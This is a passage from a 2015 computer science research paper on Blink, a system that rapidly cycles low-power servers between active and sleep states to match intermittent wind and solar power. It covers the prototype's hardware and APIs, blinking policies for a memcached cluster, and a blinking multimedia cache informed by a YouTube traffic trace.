farms, especially at low power levels that necessitate operating servers well below 50% peak power on average. However, data centers must be able to rapidly activate servers whenever workload demand increases. PowerNap (Meisner, Gold & Wenisch, 2009) proposes to eliminate idle power waste and approximate an energy-proportional server by rapidly transitioning the entire server between a high-power active state and a low-power inactive state. PowerNap uses the ACPI S3 state, which places the CPU and peripheral devices in sleep mode but pre- serves DRAM memory state, to implement inactivity. Transition latencies at millisecond- scale, or even lower, may be possible between ACPI’s fully active S0 state and its S3 state. By using S3 to emulate the inactive “off ” state.2 PowerNap is able to consume minimal energy 2 We use “active” and “on” interchange- ably to reference ACPI’s S0 state, and inactive and “off ” interchangeably to represent ACPI’s S3 state. while sleeping. Typical high-end servers draw as much as 40× less power in S3. Blink extends PowerNap in important ways. First, PowerNap is a workload-driven technique that eliminates idle server power waste—it uses rapid transitions in a workload- driven fashion to activate each server when work arrives and deactivate it when idle. In contrast, Blink is a power-driven technique that regulates average node power consumption independent of workload demands. Second, the PowerNap mechanism applies to each server independently, while Blink applies to collections of servers. Blinking policies, Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 6/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Table 1 Latencies for several desktop and laptop models to perform a complete S3 cycle (suspend and resume). Type Model S3 transition time (s) Desktop Optiplex 745 13.8 Desktop Dimension 4600 12.0 Laptop Lenovo X60 11.7 Laptop Lenovo T60 9.7 Laptop Toshiba M400 9.1 Laptop OLPC-XO (w/NIC) 1.6 Laptop OLPC-XO (no NIC) 0.2 which we formally define next, are able to capture, and potentially exploit, cross-server dependencies and correlations in distributed applications. Finally, unlike workload-driven transitions, blinking provides benefits even for the non-ideal S3 transition latencies on the order of seconds that are common in practice, as we show in ‘Balancing performance and fairness.’3 Table 1 shows S3 transition latencies for a variety of platforms, as reported in 3 PowerNap’s on-demand transitions show little benefit once latencies exceed 100 ms (Meisner, Gold & Wenisch, 2009). Agarwal et al. (2009), with the addition of Blink’s OLPC-X0 nodes. The latencies include both hardware transitions, as well as the time to restart the OS and reset its IP address. Definition 1. The blink state of each node i is defined by two parameters that determine its duty cycle di, (i) length of the ON interval ton and (ii) length of the OFF interval toff , such that di = ton ton+toff · 100% Definition 2. A blink policy defines the blink state of each node in a cluster, as well as a blink schedule for each node. The blink schedule defines the clock time at which a specified node transitions its blink state to active, which in turn dictates the time at which the node turns on and goes off. The schedule allows nodes to synchronize their blinking with one another, where appropriate. For example, if node A frequently accesses disk files stored on node B, the blink policy should specify a schedule such that the nodes synchronize their active intervals. To illustrate how a data center employs blinking to regulate its aggregate energy usage, consider a scenario where the energy supply is initially plentiful and there is sufficient workload demand for all nodes. In this case, a feasible policy is to keep all nodes continuously on. Next assume that the power supply drops by 10%, and hence, the data center must reduce its aggregate energy use by 10%. There are several blinking policies that are able to satisfy this 10% drop. In the simplest case, 10% of the nodes are turned off, while the remaining nodes continue to stay on. Alternatively, another blinking policy may specify a duty cycle of di = 90% for every node i. There are also many ways to achieve a per-server duty cycle of 90% by setting different ton and toff intervals, e.g., ton = 9 s and toff = 1 s or ton = 900 ms and toff = 100 ms. Yet another policy may assign different blink states to different nodes, e.g., depending on their loads, such that aggregate usage decreases by 10%. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 7/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 We refer to the first policy in our example above as an activation policy. An activation policy only varies the number of active servers at each power level (Chase et al., 2001; Tolia et al., 2008), such that some servers are active, while others are inactive; the energy supply dictates the size of the active server set. In contrast, synchronous policies toggle all nodes between the active and inactive state in tandem. In this case, all servers are active for ton seconds and then inactive for toff seconds, such that total power usage over each duty cycle matches the available power. Of course, since a synchronous policy toggles all servers to active at the same time, it does not reduce peak power, which has a significant impact on the cost of energy generation. An asynchronous policy may randomize the start of each node’s active interval to decrease peak power without changing the average power consumption across all nodes. In contrast to an asynchronous policy, an asymmetric policy may blink different nodes at different rates, while ensuring the necessary change in the energy footprint. For example, an asymmetric policy may be load-proportional and choose per-node blink states that are a function of current load. Finally, a staggered blinking policy is a type of asynchronous policy that staggers the start time of all nodes equally across each blink interval. A staggered policy that reduces the energy footprint by blinking nodes in proportion to the current load at each node is called staggered load-proportional policy. Blink and blink policies are designed to cap power consumption of a server cluster to the power supply. All of the policies above are equally effective at capping the average power consumption for a variable power signal over any time interval. However, the choice of the blink policy greatly impacts application performance. Although Blink’s design is application-independent, applications should be modified and made blink-aware to perform well on a blinking cluster. In this paper, we design blinking policies for two specific types of distributed applications—BlinkCache, a blinking version of memcached and GreenCache, a blinking version of multimedia cache. In designing these policies, we profile application performance for a variety of blinking policies when subjected to different changes in available power. Our goal in this paper is to demonstrate the feasibility of running distributed applications while performing well under extreme power constraints; optimizing performance for any specific workload and QOS demands is beyond the scope of this paper. BLINK PROTOTYPE Blink is a combined hardware/software platform for developing and evaluating blinking applications. This section describes our prototype’s hardware and software architecture in detail. Blink hardware platform Blink’s current hardware platform consists of two primary components: (i) a low-power server cluster that executes Blink-aware applications and (ii) a variable energy source constructed using an array of micro wind turbines and solar panels. We use renewable energy to expose the cluster to intermittent power constraints. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 8/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Energy sources We deployed an array of two wind turbines and two solar panels to power Blink. Each wind turbine is a SunForce Air-X micro-turbine designed for home rooftop deployment, and rated to produce up to 400 W in steady 28 mph winds. However, in our measurements, each turbine generates approximately 40 W of power on windy days. Our solar energy source uses Kyocera polycrystalline solar panels that are rated to produce a maximum of 65 W at 17.4 V under full sunlight. Although polycrystalline panels are known for their efficiency, our measurements show that each panel only generates around 30 W of power in full sunlight and much less in cloudy conditions. We assume blinking systems use batteries for short-term energy storage and power buffering. Modern data centers and racks already include UPS arrays to condition power and tolerate short-term grid disruptions. We connect both renewable energy sources in our deployment to a battery array that includes two rechargeable deep-cycle ResourcePower Marine batteries with an aggregate capacity of 1,320 watt-hours at 12 V, which is capable of powering our entire cluster continuously for over 14 h. However, in this paper we focus on energy-neutral operation over short time intervals, and thus use the battery array only as a small 5-minute buffer. We connect the energy sources to the battery pack using a TriStar T-60 charge controller that provides over-charging circuitry. We deployed our renewable energy sources on the roof of a campus building and used a HOBO U30 data logger to gather detailed traces of current and voltage over a period of several months under a variety of different weather conditions. While our energy harvesting deployment is capable of directly powering Blink’s server cluster, to enable controlled and repeatable experiments we leverage four Extech programmable power supplies. We use the programmable power supplies, instead of the harvesting deployment, to conduct repeatable experiments by replaying harvesting traces, or emulating other intermittent power constraints, to charge our battery array.4 4 We are able to set the initial battery level for each experiment using a separate charge controller in load-control mode. Since the battery’s voltage level indicates its current energy capacity, we require sensors to measure and report it. We use a data acquisition device (DAQ) from National Instruments to facilitate voltage measurement. As shown in Fig. 3, the prototype includes two high-precision 5MOhm resistors between the battery terminals and employs the DAQ to measure voltage across each resistor. We then use the value to compute the instantaneous battery voltage, and hence, capacity. Figure 4 shows the empirically-derived capacity of our prototype’s battery as a function of its voltage level. In addition to battery voltage, we use DC current transducers to measure the current flowing from the energy source into the battery, and the current flowing from the battery to the cluster. The configuration allows Blink to accurately measure these values every second. Low-power server cluster Our Blink prototype uses a cluster of low-power server nodes. To match the energy footprint of the cluster with the power output of our energy harvesting deployment we construct our prototype from low-power nodes that use AMD Geode processor motherboards. Each motherboard, which we scavenge from OLPC-XO laptops, consists of a 433 MHz AMD Geode LX CPU, 256 MB RAM, a 1GB solid-state flash disk, and a Linksys Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 9/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 3 Hardware architecture of the Blink prototype. USB Ethernet NIC. Each node runs the Fedora Linux distribution with kernel version 2.6.25. We connect our 10 node cluster together using an energy-efficient switch (Netgear GS116) that consumes 15 W. Each low-power node consumes a maximum of 8.6 W, and together with the switch, the 10 node cluster has a total energy footprint of around 100 W. An advantage of using XO motherboards is that they are specifically optimized for rapid S3 transitions that are useful for blinking. Further, the motherboards use only 0.1 W in S3 and 8.6 W in S0 at full processor and network utilization. The wide power range in these two states combined with the relatively low power usage in S3 makes these nodes an ideal platform for demonstrating the efficacy of Blink’s energy optimizations. Though XO motherboards are energy-efficient and consume little power even at full utilization they are not suitable for running applications which require large persistent Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 10/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 4 Empirically-measured battery capacity as a function of voltage for our deep-cycle battery. We consider the battery empty below 12 V, since using it beyond this level will reduce its lifetime. storage, such as a multimedia cache. The same design also scales to more powerful servers. As a result, for our multimedia cache application, we design a Blink-aware cluster, but we replace XO motherboards with Mac minis. Each Mac mini consists of a 2.4 GHz Intel Core 2 Duo processors, 2 GB RAM, and a 40 GB flash-based SSD. We boot each Mac mini in text mode and unload all unnecessary drivers in order to minimize the time it takes to transition into S3. With the optimizations, the time to transition to and from ACPI’s S3 state on the Mac mini is one second, and the power consumption in S3 and S0 is 1 W and 25 W respectively. Blink software architecture Blink’s software architecture consists of an application-independent control plane that combines a power management service with per-node access to energy and node-level statistics. Blink-aware applications interact with the control plane using Blink APIs to regulate their power consumption. The power management service consists of a power manager daemon that runs on a gateway node and a power client daemon that runs on each cluster node. The architecture separates mechanism from policy by exposing a single simple interface for applications to control blinking for each cluster node. The power manager daemon has access to the hardware sensors, described above, that monitor the battery voltage and current flow. Each Blink power client also monitors host-level metrics on each cluster node and reports them to the power manager. These metrics include CPU utilization, network bandwidth, and the length of the current active period. The power client exposes an internal RPC interface to the power manager that allows it to set a node’s blinking pattern. To set the blinking pattern, the power client uses the timer of the node’s real-time clock (RTC) to automatically sleep and wake up, i.e., transition back to S0, at specific intervals. Thus, the power client is able to set repetitive active and inactive durations. For example, the power manager may set a node to repeatedly be active for 50 s and inactive for 10 s. In this case, the blink interval is 60 s with Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 11/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Table 2 Blink APIs for setting per-node blinking schedules. Blinking interface setDutyCycle(int nodeId, int onPercentage) setBlinkInterval(int nodeId, int interval) syncActiveTime(int node, long currentTime) forceSleep(int nodeId, int duration) Table 3 Blink’s measurement APIs that applications use to inform their blinking decisions. Measurement interface getBatteryCapacity() getBatteryEnergy() getChargeRate(int lastInterval) getDischargeRate(int lastInterval) getServerLoadStats(int nodeId) the node being active 83% of the time and inactive 17% of the time. We assume that nodes synchronize clocks using a protocol, such as NTP, to enable policies that coordinate blink schedules across cluster nodes. The impact of clock synchronization is negligible for our blink intervals at the granularity of seconds, but may become an issue for blink intervals at the granularity of milliseconds or less. Note that clock synchronization is not an issue for applications, such as memcached, that do not perform inter-node communication. Transitioning between S0 and S3 incurs a latency that limits the length of the blink interval. Shorter blink intervals are preferable since they allow each node to more closely match the available power, more rapidly respond to changes in supply, and reduces the battery capacity necessary for short term buffering. The XO motherboard yields S3 sleep latencies that range from roughly 200 ms to 2 s depending on the set of active devices and drivers (see Table 1). For instance, since our USB NIC driver does not implement the ACPI reset resume function, we must unload and load its driver when transitioning to and from S3. As a result, the latency for XO motherboard is near 2 s. Similarly, with similar optimizations, the time to transition to and from ACPI’s S3 state on the Mac mini is 1 s. Unfortunately, inefficient and incorrect device drivers are commonplace, and represent one of the current drawbacks to blinking in practice. The Blink control plane exposes an RPC interface to integrate with external applications as shown in Tables 2 and 3. Applications use these APIs to monitor input/output current flow, battery voltage, host-level metrics and control per-node blinking patterns. Since Blink is application-independent, the prototype does not report application-level metrics. BLINKCACHE: BLINKING MEMCACHED Memcached is a distributed in-memory cache for storing key-value pairs that significantly reduces both the latency to access data objects and the load on persistent disk-backed storage. Memcached has become a core component in Internet services that store vast Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 12/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 amounts of user-generated content, with services maintaining dedicated clusters with 100s to 1,000s of nodes (Ousterhout et al., 2009). Since end users interact with these services in real-time through web portals, low-latency access to data is critical. High page load latencies frustrate users and may cause them to stop generating new content (Nah, 2004), which is undesirable since these services’ primary source of revenue derives from their content, e.g., by selling targeted ads. Memcached overview Memcached’s design uses a simple and scalable client-server architecture, where clients request a key value directly from a single candidate memcached server with the potential to store it. Clients use a built-in mapping function to determine the IP address of this candidate server. Initial versions of memcached determined the server using the function Hash(Key)%NumServers, while the latest versions use the same consistent hashing approach popularized in DHTs, such as Chord (Stoica et al., 2001). In either case, the key values randomly map to nodes without regard to their temporal locality, i.e., popularity. Since all clients use the same mapping function, they need not communicate with other clients or servers to compute which server to check for a given key. Likewise, Memcached servers respond to client requests (gets and sets) without communicating with other clients or servers. This lack of inter-node communication enables Memcached to scale to large clusters. Importantly, clients maintain the state of the cache, including its consistency with persistent storage. As a result, applications are explicitly written to use memcached by (i) checking whether an object is resident in the cache before issuing any subsequent queries, (ii) inserting a newly referenced object into the cache if it is not already resident, and (iii) updating a cached object to reflect a corresponding update in persistent storage. Each memcached server uses the Least Recently Used (LRU) replacement policy to evict objects. One common example of a cached object is an HTML fragment generated from the results of multiple queries to a relational database and other services. Since a single HTTP request for many Internet services can result in over 100 internal, and potentially sequential, requests to other services (DeCandia et al., 2007; Ousterhout et al., 2009), the cache significantly decreases the latency to generate the HTML. Access patterns and performance metrics The popularity of web sites has long been known to follow a Zipf-like distribution (Breslau et al., 1999; Wolman et al., 1999), where the fraction of all requests for the ith most popular document is proportional to 1/iα for some constant α. Previous studies (Breslau et al., 1999; Wolman et al., 1999) have shown that α is typically less than one for web site popularity. The key characteristic of a Zipf-like distribution is its heavy tail, where a significant fraction of requests are for relatively unpopular objects. We expect the popularity of user-generated content for an Internet service to be similar to the broader web, since, while some content may be highly popular, such as a celebrity’s Facebook page, most users are primarily interested in either their own content or the content of close friends and associates. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 13/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 5 The popularity rank, by number of fans, for all 20 million public group pages on Facebook follows a Zipf-like distribution with α = 0.6. As a test of our expectation, we rank all 20 million user-generated fan pages on Facebook by their number of fans. We use the size of each page’s fan base as a rough approximation of the popularity of its underlying data objects. Figure 5 confirms that the distribution is Zipf-like with α approximately 0.6. Recent work also states that Facebook must store a significant fraction of their data set in massive memcached clusters, i.e., on the order of 2,000 nodes, to achieve high hit rates, e.g., 25% of the entire data set to achieve a 96.5% hit rate (Ousterhout et al., 2009). This characteristic is common for Zipf-like distributions with low α values, since many requests for unpopular objects are inside the heavy tail. Thus, the distribution roughly divides objects into two categories: the few highly popular objects and the many relatively unpopular objects. As cache size increases, it stores a significant fraction of objects that are unpopular compared to the few popular objects, but nearly uniformly popular compared to each other. These mega-caches resemble a separate high-performance storage tier (Ousterhout et al., 2009) for all data objects, rather than a small cache for only the most popular data objects. Before discussing different design alternatives for BlinkCache, we define our perfor- mance metrics. The primary cache performance metric is hit ratio, or hit rate, which represents the percentage of object requests that the cache services. A higher hit rate indicates both a lower average latency per request, as well as lower load on the back-end storage system. In addition to hit rate, we argue that fairness should be a secondary performance metric for large memcached clusters that store many objects of equal popularity. A fair cache distributes its benefits—low average request latency—equally across objects. Caches are usually unfair, since their primary purpose is to achieve high hit rates by storing more popular data at the expense of less popular data. However, fairness increases in importance when there are many objects with a similar level of popularity, as in today’s large memcached clusters storing data that follows a Zipf-like popularity Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 14/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 distribution. An unfair cache results in a wide disparity in the average access latency for these similarly popular objects, which ultimately translates to end-users receiving vastly different levels of performance. We use the standard deviation of average request latency per object as our measure of fairness. The lower the standard deviation the more fair the policy, since this indicates that objects have average latencies that are closer to the mean. BlinkCache design alternatives We compare variants of three basic memcached policies for variable power constraints: an activation policy, a synchronous policy, and an asymmetric load-proportional policy. In all cases, any get request to an inactive server always registers as a cache miss, while any set request is deferred until the node becomes active. We defer a discussion of the implementation details using Blink to the next section. • Activation policy. An activation policy ranks servers 1...N and always keeps the top M servers active, where M is the maximum number of active servers the current power level supports. We discuss multiple activation variants, including a static variant that does not change the set of available servers in each client’s built-in mapping function to reflect the current set of active servers, and a dynamic variant that does change the set. We also discuss a key migration variant that continuously ranks the popularity of objects and migrates them to servers 1...N in rank order. • Synchronous policy. A synchronous policy keeps all servers active for time t and inactive for time T − t for every interval T, where t is the maximum duration the current power level supports and T is short enough to respond to power changes but long enough to mitigate blink overhead. The policy does not change the set of available servers in each client’s built-in mapping function, since all servers are active every interval. • Load-proportional policy. A load-proportional policy monitors the aggregate popularity of objects Pi that each server i stores and keeps each server active for time ti and inactive for time T − ti for every interval T. The policy computes each ti by distributing the available power in the same proportion as the aggregate popularity Pi of the servers. The load-proportional policy also migrates similarly popular objects to the same server. Activation policy A straightforward approach to scaling memcached as power varies is to activate servers when power is plentiful and deactivate servers when power is scarce. One simple method for choosing which servers to activate is to rank them 1...N and activate and deactivate them in order. Since, by default, memcached maps key values randomly to servers, our policy for ranking servers and keys is random. In this case, a static policy variant that does not change each client’s built-in mapping function to reflect the active server set arbitrarily favors keys that happen to map to higher ranked servers, regardless of their popularity. As a result, requests for objects that map to the top-ranked server will see a significantly lower average latency than requests for objects that happen to map to the Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 15/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 6 To explicitly control the mapping of keys to servers, we interpose always-active request proxies between memcached clients and servers. The proxies are able to monitor per-key hit rates and migrate similarly popular objects to the same nodes. bottom-ranked server. One way to correct the problem is to dynamically change the built-in client mapping function to only reflect the current set of active servers. With constant power, dynamically changing the mapping function will result in a higher hit rate since the most popular objects naturally shift to the current set of active servers. To eliminate invalidation penalties and explicitly control the mapping of individual keys to servers we interpose an always-active proxy between memcached clients and servers to control the mapping (Fig. 6). In this design, clients issue requests to the proxy, which maintains a hash table that stores the current mapping of keys to servers, issues requests to the appropriate back-end server, and returns the result to the client. Synchronous policy The migration-enabled activation policy, described above, approaches the optimal policy for maximizing the cache’s hit rate, since ranking servers and mapping objects to them according to popularity rank makes the distributed cache operate like a centralized cache that simply stores the most popular objects regardless of the cache’s size. We define optimal as the hit rate for a centralized cache of the same size as the distributed Memcached instance under the same workload. However, the policy is unfair for servers that store similarly popular objects, since these servers should have equal rankings. The activation policy is forced to arbitrarily choose a subset of these equally ranked servers to deactivate. In this case, a synchronous policy is significantly more fair and results in nearly the same hit rate as the optimal activation policy. To see why, consider the simple 4-node memcached cluster in Fig. 7 with enough available power to currently activate half the cluster. There is enough power to support either (i) our activation policy with migration that keeps two nodes continuously active or (ii) a synchronous policy that keeps four nodes active half the time but synchronously blinks them between the active and inactive state. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 16/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 7 Graphical depiction of a static/dynamic activation blinking policy (A), an activation blinking policy with key migration (B), and a synchronous blinking policy (C). For now we assume that all objects are equally popular, and compare the expected hit rate and standard deviation of average latency across objects for both policies, assuming a full cache can store all objects at full power on the 4 nodes. For the activation policy, the hit rate is 50%, since it keeps two servers active and these servers store 50% of the objects. Since all objects are equally popular, migration does not significantly change the results. In this case, the standard deviation is 47.5 ms, assuming an estimate of 5 ms to access the cache and 100 ms to regenerate the object from persistent storage. For a synchronous policy, the hit rate is also 50%, since all 4 nodes are active half the time and these nodes store 100% of the objects. However, the synchronous policy has a standard deviation of 0 ms, since all objects have a 50% hit probability, if the access occurs when a node is active, and a 50% miss probability, if the access occurs when a node is inactive. Rather than half the objects having a 5 ms average latency and half having a 100 ms average latency, as with activation, a synchronous policy ensures an average latency of 52.5 ms across all objects. Note that the synchronous policy is ideal for a normal memcached cluster with a mapping function that randomly maps keys to servers, since the aggregate popularity of objects on each server will always be roughly equal. Further, unlike an activation policy that uses the dynamic mapping function, the synchronous policy does not incur invalidation penalties and is not arbitrarily unfair to keys on lower-ranked servers. Load-proportional policy A synchronous policy has the same hit rate as an activation policy when keys have the same popularity, but is significantly more fair. However, an activation policy with migration is capable of a significantly higher hit rate for highly skewed popularity distributions. A proportional policy combines the advantages of both approaches for Zipf-like distributions, where a few key values are highly popular but there is a heavy, but significant, tail of similarly unpopular key values. As with our activation policy, Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 17/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Table 4 Summary of the best policy for a given performance metric and workload combination. Metric Workload Best policy Hit Rate Uniform Synchronous Hit Rate Zipf Activation (Migration) Fairness Uniform/Zipf Synchronous Fairness + Hit Rate Zipf Load-proportional a proportional policy ranks servers and uses a proxy to monitor object popularity and migrate objects to servers in rank order. However, the policy distributes the available power to servers in the same proportion as the aggregate popularity of their keys. For example, assume that in our 4 server cluster after key migration the percentage of total hits that go to the first server is 70%, the second server is 12%, the third server is 10%, and the fourth server is 8%. If there is currently 100 W of available power then the first server ideally receives 70 W, the second server 12 W, the third server 10 W, and the fourth server 8 W. These power levels then translate directly to active durations over each interval T. In practice, if the first server’s maximum power is 50 W, then it will be active the entire interval, since its maximum power is 70 W. The extra 20 W is distributed to the remaining servers proportionally. If all servers have a maximum power of 50 W, the first server receives 50 W, the second server receives 20 W, i.e., 40% of the remaining 50 W, the third server receives 16.7 W, and the fourth server receives 13.3 W. These power levels translate into the following active durations for a 60 s blink interval: 60 s, 24 s, 20 s, and 16 s, respectively. The hit rate from a proportional policy is only slightly worse than the hit rate from the optimal activation policy. In this example, we expect the hit rate from an activation policy to be 85% of the maximum hit rate from a fully powered cluster, while we expect the hit rate from a proportional policy to be 80.2%. However, the policy is more fair to the 3 servers—12%, 10%, and 8%—with similar popularities, since each server receives a similar total active duration. The Zipf distribution for a large memcached cluster has similar attributes. A few servers store highly popular objects and will be active nearly 100% of the time, while a large majority of the servers will store equally unpopular objects and blink in proportion to their overall unpopularity. Summary Table 4 provides a summary of the best policy for each performance metric and workload combination. In essence, an activation policy with key migration will always have the highest hit rate. However, for distributions with equally popular objects, the synchronous policy achieves a similar hit rate and is more fair. A load-proportional policy combines the best attributes of both for Zipf-like distributions, which include a few popular objects but many similarly unpopular objects. We evaluate these design alternatives in ‘Evaluation.’ GREENCACHE: BLINKING MULTIMEDIA CACHE In the previous section we described how a stateless in-memory cache server can leverage the blinking abstraction to perform well on intermittent power. In this section, we study Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 18/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 the characteristics of a distributed multimedia cache, which serves videos requested by clients, either by fetching them from the cache or retrieving them from backend servers. We assume the cache is write-through in that it stores cached videos on disk. A distributed multimedia cache is different than Memcached in many ways—(a) it is not a key-value storage system and, unlike Memcached, it streams data to multimedia players, (b) it stores data on persistent storage and its data size is often much larger than that of Memcached, and (c) like any streaming server it can push data in advance to multimedia players to minimize buffering time and enhance viewers’ experience. In our analysis, we use traces of YouTube traffic as our data source, since YouTube is one of the most popular user-generated video content site and Google deploys 1,000s of servers to serve YouTube requests made by users all around the world. Multimedia cache overview Multimedia caches are widely used to reduce backhaul bandwidth usage and improve viewers’ experience by reducing buffering time or access latency. Apart from traditional multimedia servers, network operators have also started deploying multimedia caches at cellular towers to cater for the growing demand of multimedia content from smartphone users. Traditionally, network operators have deployed caches only at centralized locations, such as operator peering points, in part, for both simplicity and ease of management (Xu et al., 2011). However, researchers and startups have recently recognized the benefit of placing caches closer to edge (Xu et al., 2011; Stoke Solutions, 2011). Co-locating server caches closer to cell towers reduces both access latency, by eliminating the need to route requests for cached data through a distant peering point, and backhaul bandwidth usage from the cell tower to the peering point. Caches co-located with cell towers primarily target multimedia data, since it consumes the largest fraction of bandwidth and is latency-sensitive. We study the design of GreenCache in the context of such a distributed multimedia cache for cellular towers. Many of these cellular towers, especially in developing countries, are located in remote areas without reliable access to power. As a result, renewable energy sources have been proposed to power these cellular towers (Guay, 2012; Balshe, 2011). To handle intermittency in the power supply, we assume a cache architecture that comprises of a number of low-power servers, since a single large cache is not energy-proportional, and, thus, not well-suited to operating off intermittent renewable energy sources. The advantage of a distributed multimedia cache is that it allows the cache size to scale up and down based on available power. However, it introduces a new complication: if servers are inactive due to power shortages by renewables then the data cached on them becomes unavailable. If data resides on an inactive server, the client must either wait until the server is active, e.g., there is enough power, or retrieve the already cached data again from the origin server. In this case, the blinking abstraction enables the cache to provide service, albeit at degraded performance, during shortfall periods. In essence, blinking provides a cache with new options in its design space. Rather than having a small cache composed of the Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 19/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 8 The top part of the figure shows a potential streaming schedule for a blinking node while the bottom half shows the smooth play out with is achieved with the aid of a client-side buffer. number of always-on servers the available power can sustain, blinking provides the option of having a much larger cache composed of servers that are active for only a fraction of time each blink interval, e.g., active for 10 s during each minute interval. The use of blinking raises new challenges in multimedia cache design. The main challenge is to ensure smooth uninterrupted video playback even while blinking. Doing so implies that caches have to stream additional data during their active periods to compensate for lack of network streaming during sleep periods. Further, end-clients will need to employ additional client-side buffers and might see higher startup latencies. Since multimedia applications are very sensitive to fluctuation in network bandwidth that might cause delayed data delivery at the client, most applications prefer that video players employ a buffer to smooth out such fluctuations and provide an uninterrupted, error free play out of the data. This buffer, which already exists for most multimedia applications on the client side, integrates well into the blinking approach since it also allows the cache to bridge outage times in individual cache servers, as shown in Fig. 8. A blinking cache will stream additional chunks when active, which are buffered at the client. As shown in this figure, the player is then able to play the video smoothly and masks interruptions from the viewer as long as it gets the next chunk of data before the previous chunk has finished playing. Finally, in a typical cell tower or 3G/4G/WiMAX scenario the downstream bandwidth (∼30–40 Mbps) is much less than the bandwidth a cache server can provide, which is Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 20/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 generally limited by its network card and disk I/O. So, the cache server can potentially reduce its energy consumption by sending data at its full capacity for a fraction of a time interval (usually few seconds) and going to a low-power state for the remaining period of the time interval, as shown in Fig. 8. In essence, the server could employ the blinking abstraction to reduce its energy footprint while still satisfying the downstream bandwidth requirement of the cell tower or WiMAX station. Moreover, blinking facilitates a cache to employ more servers than it can keep active with the available power, and thus provides an opportunity to reduce server load and bandwidth usage. The primary drawback of a blinking cache is that it stalls a request if the requested video is not currently available on an active server. If a client requests a video that is present on an inactive server, the cache can either get the video from the back-end server or the client pauses play out until the inactive server becomes active. While getting the video from the back-end server, instead of waiting for the inactive server to become active, reduces the buffering time, it increases the bandwidth cost. As we describe later in this section, GreenCache uses a low-power always-on proxy and staggered load-proportional blinking policy to reduce buffering time while sending requests to back-end servers only if data is not available in the cache. YouTube trace analysis To inform the design of GreenCache based on the characteristics of multimedia traffic and viewer behavior, we analyze a network trace that was obtained by monitoring YouTube traffic entering and leaving a campus network at the University of Connecticut. The network trace is collected with the aid of a monitoring device consisting of PC with a Data Acquisition and Generation (DAG) card (Endace, 2011), which can capture Ethernet frames. The device is located at a campus network gateway, which allows it to capture all traffic to and from the campus network. It was configured to capture a fixed length header of all HTTP packets going to and coming from the YouTube domain. The monitoring period for this trace was 72 h. This trace contains a total of 105,339 requests for YouTube videos out of which ∼80% of the video requests are single requests which leaves about 20% of the multiple requests to take advantage of caching of the requested videos. We would like to point out that a similar caching potential (24% in this case) has been reported in a more global study of 3G networks traffic analysis by Erman et al. (2011). Figure 9 shows the popularity distribution of the 100 most popular videos, which is obtained based on the user requests recorded in the trace. This figure only shows the 100 most popular videos since the trace contains many videos with a very low popularity (<10 requests) and we wanted to depict the distribution of the most popular videos in more detail. The data obtained from the analysis of the trace shows that, despite the very long tail popularity distribution, caching can have an impact on the performance of such a video distribution system. In earlier work (Khemmarart et al., 2011), we have shown that, not only caching but also the prefetching of prefixes of videos that are shown on the related video list of a YouTube video page can improve the viewers experience of watching videos. Further analysis of the Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 21/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 9 Video popularity (100 out of 105,339). trace revealed that 47,986 request out of the 105,339 had the tag related video (∼45%), which indicates that these videos have been chosen by viewers from the related video list that is shown on each YouTube video’s web page. In addition to identifying videos that are selected from the related list, we also determine the position on the related list the video was selected from and show the result in Fig. 10A. It shows that users tend to request from the top 10 videos shown on the related list of a video, which accounts for 80% of the related video requests in the trace. This data shows that, prefetching the prefixes of the top 10 videos shown on the related list of a currently watched video can significantly increase viewer’s experience, since the initial part can be streamed immediately from a location close to the client. Based on these results, we decided to evaluate a blinking multimedia cache that performs both, traditional caching, and prefix prefetching for the top 10 videos on the related video list. We also analyze the trace to investigate if viewers switch to a new video before they completely finish watching the current video. In order to analyze this behaviour, we look into the timestamps of a user requesting two consecutive videos. We calculate the difference of these timestamps and compare it with the total length of the first video requested to determine if the user has switched between videos before the previous video is completely viewed. Figure 10B shows the number of occurrences (in percent out of the total number of videos watched) a video is watched for x% of its total length. This result shows that only in 45% of the cases videos are watched completely (also this number is similar to the global study performed by Erman et al. (2011)). In all other cases only part of the video is watched, with the majority of these cases (∼40%) falling in the 0–20% viewing session length. This result let us to the decision to divide a video into equal-sized chunks, which allows for the storage of different chunks that belong to a single video on different nodes of the cache cluster. In 